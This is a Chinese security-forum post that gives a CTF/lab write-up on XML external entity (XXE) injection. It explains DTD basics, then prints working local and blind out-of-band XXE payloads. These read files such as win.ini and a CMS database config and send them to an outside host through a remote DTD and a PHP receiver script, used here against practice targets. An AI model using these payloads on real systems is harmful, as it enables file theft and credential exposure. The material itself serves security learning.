吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

搜索
查看: 2253|回复: 14
收起左侧

[CTF] 【CTF】漏洞挖掘XXE wp

[复制链接]
孤樱懶契 发表于 2021-8-22 06:36
本帖最后由 孤樱懶契 于 2021-8-22 08:29 编辑

前言

  • 漏洞挖掘XXE实体注入,学习一下!

做XXE题目之前我们先了解一下XXE实体注入的原理和利用方法

XXE基础知识

XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素

image-20210819141610681

所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成:元素、属性、实体、PCDATA、CDATA,由于网上太多介绍就不详细说了

DTD(文档类型定义)

DTD(document type defined)的作用是定义 XML 文档的合法构建模块。

DTD 可以在 XML 文档内声明,也可以外部引用。

而DTD的外部实体引用正是XXE漏洞诱因

首先写一个测试xml的文档的php代码

<?php
$test=$_POST['xml'];
$obj = simplexml_load_string($test,'SimpleXMLElement',LIBXML_NOENT);
print_r($obj);
highlight_file(__FILE__);
?>

1、内部声明

完整实例

<?xml version="1.0"?>
<!DOCTYPE note [
  <!ELEMENT note (to,from,heading,body)>
  <!ELEMENT to      (#PCDATA)>
  <!ELEMENT from    (#PCDATA)>
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body    (#PCDATA)>
]>
<note>
  <to>George</to>
  <from>John</from>
  <heading>Reminder</heading>
  <body>Don't forget the meeting!</body>
</note>

将我们刚刚的php代码利用burp抓包post传入内部声明形式输出看看,注意:要url编码一下,不然&无法被解析而报错

如下内部声明输出结果

image-20210819142339515

2、外部声明

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note> 

image-20210819142549954

同样编码一下,正常输出

image-20210819142611233

由此,我们了解了基本的DTD内部和外部声明的使用

DTD实体

DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用。

实体又分为一般实体和参数实体
1,一般实体的声明语法:
引用实体的方式:&实体名;
2,参数实体只能在DTD中使用,参数实体的声明格式:
引用实体的方式:%实体名;

1、内部实体声明:

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">
]>

<test>&writer;©right;</test>

post传进去看看输出结果,同样正常输出

image-20210819142830986

2、外部实体声明

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
]>
<author>&writer;©right;</author>

在了解了基础知识后,下面开始了解xml外部实体注入引发的问题。

XXE的攻击方法

方法一:直接通过DTD外部实体声明

<?xml version="1.0"?>
<!DOCTYPE xml [
<!ENTITY xxe SYSTEM "file:///C:/1.txt">
]>
<xxe>&xxe;</xxe>

发包访问我C盘目录中1.txt文件

image-20210819143850362

方法二:通过DTD文档引入外部DTD文档,再引入外部实体声明,由于普通的引入外部实体声明就不说了,直接说如果不回显怎么办

image-20210819144644467

当我们本地将php代码中的回显给关了,那我们怎么获取当前电脑的c:/1.txt文件呢?很简单,直接在公网域名上构造第一个php文件x.php

<?php
$content = $_GET['1'];
if(isset($content)){
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    echo 'no data input';
}

和第二个xxe.xml的外部实体文档

<!ENTITY % all
"<!ENTITY % send SYSTEM 'http://127.0.0.1/xml/x.php?1=%file;'"
>
%all;

image-20210819145202712

接着构造一个payload

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/1.txt">
<!ENTITY % remote SYSTEM "http://127.0.0.1/xml/xxe.xml">
%remote;
%send;
]>

post传参发包,发现生成了一个flag.txt

image-20210819145349842

接着我们就得到1.txt的base64的形式,解码一下,就可以得到其中的内容

image-20210819145619095

支持的协议有哪些?

image-20210819145646289

具体的根据情况会产生的危害:

1、读取任意文件

2、执行系统命令(expect需要扩展支持)

3、探测内网端口(利用http访问)

4、攻击内网网站等

XXE-1

通过上面,我们已经充分了解了XXE的基础知识,直接进入实战环节

实验环境:http://59.63.200.79:8014/xxe/index.php

打开靶场看到一个有xxe注入的点

 $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);

而$postStr是由post传参的内容所控制,所以这里存在XXE漏洞

最底下爆出了绝对路径

image-20210819150834903

这题目标很明确了,由于攻击没有回显,在公网的某个服务器中放入我们刚刚的x.phpxxe.xml

image-20210819150949128

接着利用绝对路径可以读取flag,payload

若是你没有公网vps服务器的话,这里有两个挂在公网上的可以试用

http://59.63.200.79:8017/1.xml

http://59.63.200.79:8017/3.txt

访问上面那个一样可以

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/phpStudy/WWW/xxe/flag.php">
<!ENTITY % remote SYSTEM "http://59.63.200.79:8017/1.xml">
%remote;
%send;
]>

image-20210819151333317

image-20210819151408189

base64解码一下就是flag了

XXE-2

实验环境:http://59.63.200.79:8207/

打开一看是个网站,看一下源码发现是闪灵CMS建站

image-20210819151649693

下载源码找关键函数simplexml_load_string,这个容易出现xxe

image-20210819153630727

分析

1、$postArr是php://input直接接受post传参的。php://input可以读取没有处理过的POST数据,相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置,php://input不能用于enctype=multipart/form-data。明显存在XXE

2、想让if满足条件,$signature不为空,$echostr要为空,追踪发现signature和echostr都是GET传参

3、漏洞位置在weixin/index.php,可以通过源码知道存在/conn/conn.php的文件,里面包含着数据库文件

知道了地点了,测试了下是windows系统,访问一下c:/windows/win.ini

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/windows/win.ini">
<!ENTITY % remote SYSTEM "http://59.63.200.79:8017/1.xml">
%remote;
%send;
]>

image-20210819154854594

可以直接利用爆出的路径读取conn/conn.php

payload如下

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=C:/phpStudy/scms/conn/conn.php">
<!ENTITY % remote SYSTEM "http://59.63.200.79:8017/1.xml">
%remote;
%send;
]>

image-20210819154957834

你们访问http://59.63.200.79:8017/3.txt应该就可以看到

接着解码看看,数据库的全部数据都出来了,可以直接

image-20210819155118177

根据源码可以找到adminer.php是连接数据库的后台http://59.63.200.79:8207/adminer.php

image-20210819155359567

image-20210819155533478

image-20210819160022233

但是很奇怪的是,这个数据库居然在linux系统里面,所以登陆不了管理员后台

image-20210819160236364

日志和UDF都撸不了,没权限开读文件功能。

我的个人博客

孤桜懶契:http://gylq.gitee.io

免费评分

参与人数 10吾爱币 +9 热心值 +9 收起 理由
zenlsp + 1 我很赞同!
DancingLight + 1 + 1 热心回复!
努力加载中 + 1 + 1 热心回复!
Lugia + 1 + 1 谢谢@Thanks!
Ybit + 1 + 1 用心讨论,共获提升!
gaosld + 1 + 1 谢谢@Thanks!
ironmanxxl + 1 我很赞同!
timeni + 1 + 1 我很赞同!
lingyun011 + 1 + 1 我很赞同!
G690 + 1 + 1 用心讨论,共获提升!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

ongp1347 发表于 2021-8-22 21:47
楼主真是另我开阔眼界 学习了 谢谢分享
xcy521qlk 发表于 2021-8-23 12:40
dear999 发表于 2021-8-23 19:49
tbloy 发表于 2021-9-5 01:13
又来学习技术了。
咔c君 发表于 2021-9-6 20:56
学习了不错
小新小新 发表于 2021-9-7 16:43

最近吾爱发渗透,土司发破解比较多啊
wsf5201314 发表于 2021-9-8 19:12
学习了 感谢分享
GaoWALT 发表于 2021-9-9 20:14
可以厉害啊大佬
猪之歌 发表于 2021-9-11 14:12
学习了,虽然不是挺懂
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2021-9-18 06:58

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表